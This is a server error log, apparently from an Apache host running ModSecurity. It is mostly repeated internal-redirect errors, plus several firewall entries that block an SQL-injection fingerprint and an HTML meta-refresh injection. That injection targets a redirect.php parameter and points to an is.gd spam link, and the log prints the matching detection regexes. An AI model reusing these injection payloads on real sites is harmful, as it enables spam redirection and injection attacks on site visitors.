[Mon May 11 22:51:43.270330 2026] [core:error] [pid 1590352:tid 1590409] [client 20.63.80.119:64573] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:43.635206 2026] [core:error] [pid 1605480:tid 1605538] [client 20.63.80.119:64452] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:43.635236 2026] [core:error] [pid 1605480:tid 1605538] [client 20.63.80.119:64452] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:44.048635 2026] [core:error] [pid 1601130:tid 1601151] [client 20.63.80.119:64559] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:44.048669 2026] [core:error] [pid 1601130:tid 1601151] [client 20.63.80.119:64559] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:44.839711 2026] [core:error] [pid 1605480:tid 1605531] [client 20.63.80.119:64477] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:44.839749 2026] [core:error] [pid 1605480:tid 1605531] [client 20.63.80.119:64477] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:45.636715 2026] [core:error] [pid 1601130:tid 1601164] [client 20.63.80.119:64472] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:45.636741 2026] [core:error] [pid 1601130:tid 1601164] [client 20.63.80.119:64472] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:46.350306 2026] [core:error] [pid 1605480:tid 1605542] [client 20.63.80.119:64478] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:46.350338 2026] [core:error] [pid 1605480:tid 1605542] [client 20.63.80.119:64478] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:46.917667 2026] [core:error] [pid 1606352:tid 1606439] [client 20.63.80.119:5060] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:46.917697 2026] [core:error] [pid 1606352:tid 1606439] [client 20.63.80.119:5060] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:47.413571 2026] [core:error] [pid 1590352:tid 1590395] [client 20.63.80.119:5061] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:47.413617 2026] [core:error] [pid 1590352:tid 1590395] [client 20.63.80.119:5061] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:47.869014 2026] [core:error] [pid 1605480:tid 1605545] [client 20.63.80.119:64451] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:47.869047 2026] [core:error] [pid 1605480:tid 1605545] [client 20.63.80.119:64451] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:48.401506 2026] [core:error] [pid 1630927:tid 1630938] [client 20.63.80.119:64502] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:48.401537 2026] [core:error] [pid 1630927:tid 1630938] [client 20.63.80.119:64502] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:49.118573 2026] [core:error] [pid 1590352:tid 1590407] [client 20.63.80.119:64546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:49.118607 2026] [core:error] [pid 1590352:tid 1590407] [client 20.63.80.119:64546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:49.535500 2026] [core:error] [pid 1606352:tid 1606437] [client 20.63.80.119:64488] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:49.535529 2026] [core:error] [pid 1606352:tid 1606437] [client 20.63.80.119:64488] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:49.962007 2026] [core:error] [pid 1590352:tid 1590412] [client 20.63.80.119:64574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:49.962038 2026] [core:error] [pid 1590352:tid 1590412] [client 20.63.80.119:64574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:51.269563 2026] [core:error] [pid 1601130:tid 1601161] [client 20.63.80.119:4999] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:51.269601 2026] [core:error] [pid 1601130:tid 1601161] [client 20.63.80.119:4999] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:51.896961 2026] [core:error] [pid 1605480:tid 1605543] [client 20.63.80.119:64495] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:51.897291 2026] [core:error] [pid 1605480:tid 1605543] [client 20.63.80.119:64495] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:52.389657 2026] [core:error] [pid 1590352:tid 1590405] [client 20.63.80.119:64568] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:52.389942 2026] [core:error] [pid 1590352:tid 1590405] [client 20.63.80.119:64568] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:52.792718 2026] [core:error] [pid 1606352:tid 1606424] [client 20.63.80.119:64541] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:52.792748 2026] [core:error] [pid 1606352:tid 1606424] [client 20.63.80.119:64541] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:53.506339 2026] [core:error] [pid 1605480:tid 1605537] [client 20.63.80.119:64449] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:53.506370 2026] [core:error] [pid 1605480:tid 1605537] [client 20.63.80.119:64449] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:54.263848 2026] [core:error] [pid 1630927:tid 1630946] [client 20.63.80.119:64461] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:54.263882 2026] [core:error] [pid 1630927:tid 1630946] [client 20.63.80.119:64461] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:55.837999 2026] [core:error] [pid 1606352:tid 1606438] [client 20.63.80.119:64465] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:55.838029 2026] [core:error] [pid 1606352:tid 1606438] [client 20.63.80.119:64465] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:56.552680 2026] [core:error] [pid 1601130:tid 1601171] [client 20.63.80.119:64498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:56.559983 2026] [core:error] [pid 1601130:tid 1601171] [client 20.63.80.119:64498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:57.824224 2026] [core:error] [pid 1590352:tid 1590414] [client 20.63.80.119:64505] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:57.824271 2026] [core:error] [pid 1590352:tid 1590414] [client 20.63.80.119:64505] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:59.521593 2026] [core:error] [pid 1605480:tid 1605538] [client 20.63.80.119:5090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:51:59.521627 2026] [core:error] [pid 1605480:tid 1605538] [client 20.63.80.119:5090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:01.269847 2026] [core:error] [pid 1630927:tid 1630943] [client 20.63.80.119:5062] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:01.269878 2026] [core:error] [pid 1630927:tid 1630943] [client 20.63.80.119:5062] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:01.914834 2026] [security2:error] [pid 1630927:tid 1630947] [client 74.7.241.58:38976] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'sos' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: sos found within REQUEST_HEADERS:referer: https://letamsgarage.fr/wp-content/plugins/revslider/public/assets/js/'+r+'"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "letamsgarage.fr"] [uri "/wp-content/plugins/revslider/public/assets/js/+r+"] [unique_id "agJBcWiGYYhUwDaJINmVVgAAAVE"], referer: https://letamsgarage.fr/wp-content/plugins/revslider/public/assets/js/'+r+'
[Mon May 11 22:52:01.915817 2026] [security2:error] [pid 1630927:tid 1630947] [client 74.7.241.58:38976] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/wp-content/plugins/revslider/public/assets/js/+r+"] [unique_id "agJBcWiGYYhUwDaJINmVVgAAAVE"], referer: https://letamsgarage.fr/wp-content/plugins/revslider/public/assets/js/'+r+'
[Mon May 11 22:52:01.921185 2026] [core:error] [pid 1588898:tid 1588921] [client 20.63.80.119:64542] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:01.921205 2026] [core:error] [pid 1588898:tid 1588921] [client 20.63.80.119:64542] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:02.853836 2026] [core:error] [pid 1601130:tid 1601158] [client 20.63.80.119:64506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:02.853862 2026] [core:error] [pid 1601130:tid 1601158] [client 20.63.80.119:64506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:03.933430 2026] [core:error] [pid 1601130:tid 1601172] [client 20.63.80.119:5058] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:03.933463 2026] [core:error] [pid 1601130:tid 1601172] [client 20.63.80.119:5058] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:03.980325 2026] [security2:error] [pid 1630927:tid 1630947] [client 74.7.241.58:38976] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agJBcWiGYYhUwDaJINmVVgAAAVE"], referer: https://letamsgarage.fr/wp-content/plugins/revslider/public/assets/js/'+r+'
[Mon May 11 22:52:04.447400 2026] [core:error] [pid 1605480:tid 1605522] [client 20.63.80.119:5102] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:04.447432 2026] [core:error] [pid 1605480:tid 1605522] [client 20.63.80.119:5102] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:04.839387 2026] [core:error] [pid 1601130:tid 1601161] [client 20.63.80.119:64512] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:04.839422 2026] [core:error] [pid 1601130:tid 1601161] [client 20.63.80.119:64512] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:05.653443 2026] [core:error] [pid 1606352:tid 1606437] [client 20.63.80.119:5067] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:05.653499 2026] [core:error] [pid 1606352:tid 1606437] [client 20.63.80.119:5067] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:06.764050 2026] [core:error] [pid 1588898:tid 1590048] [client 20.63.80.119:5073] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:52:06.764086 2026] [core:error] [pid 1588898:tid 1590048] [client 20.63.80.119:5073] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 22:53:17.347174 2026] [security2:error] [pid 1630927:tid 1630949] [client 194.233.64.127:60683] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/tech_salaries_45076>kampus swasta terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://is.gd/tech_salaries_45076 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvWiGYYhUwDaJINmVxQAAAVM"]
[Mon May 11 22:53:17.347860 2026] [security2:error] [pid 1630927:tid 1630949] [client 194.233.64.127:60683] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Is.gd/tech_salaries_45076>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Is.gd/tech_salaries_45076 /> found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Is.gd/tech_salaries_45076>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Is.gd/tech_salaries_45076 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [ta [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvWiGYYhUwDaJINmVxQAAAVM"]
[Mon May 11 22:53:17.348011 2026] [security2:error] [pid 1630927:tid 1630949] [client 194.233.64.127:60683] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Is.gd/tech_salaries_45076 /> found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Is.gd/tech_salaries_45076>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Is.gd/tech_salaries_45076 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_A [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvWiGYYhUwDaJINmVxQAAAVM"]
[Mon May 11 22:53:17.348277 2026] [security2:error] [pid 1630927:tid 1630949] [client 194.233.64.127:60683] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Is.gd/tech_salaries_45076>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Is.gd/tech_salaries_45076 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvWiGYYhUwDaJINmVxQAAAVM"]
[Mon May 11 22:53:17.374775 2026] [security2:error] [pid 1630927:tid 1630949] [client 194.233.64.127:60683] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Is.gd/tech_salaries_45076>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Is.gd/tech_salaries_45076 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvWiGYYhUwDaJINmVxQAAAVM"]
[Mon May 11 22:53:17.375246 2026] [security2:error] [pid 1630927:tid 1630949] [client 194.233.64.127:60683] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvWiGYYhUwDaJINmVxQAAAVM"]
[Mon May 11 22:53:17.375537 2026] [security2:error] [pid 1630927:tid 1630949] [client 194.233.64.127:60683] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvWiGYYhUwDaJINmVxQAAAVM"]
[Mon May 11 22:53:17.997073 2026] [security2:error] [pid 1588898:tid 1588921] [client 194.233.64.127:60705] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://is.gd/tech_salaries_45076>kampus swasta terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://is.gd/tech_salaries_45076 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJBvaFW67LJTsgN3jQUhQAAABc"]
[Mon May 11 22:53:18.001309 2026] [security2:error] [pid 1588898:tid 1588921] [client 194.233.64.127:60705] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Is.gd/tech_salaries_45076>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Is.gd/tech_salaries_45076 /> found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Is.gd/tech_salaries_45076>Kampus Swasta Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=https://Is.gd/tech_salaries_45076 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag 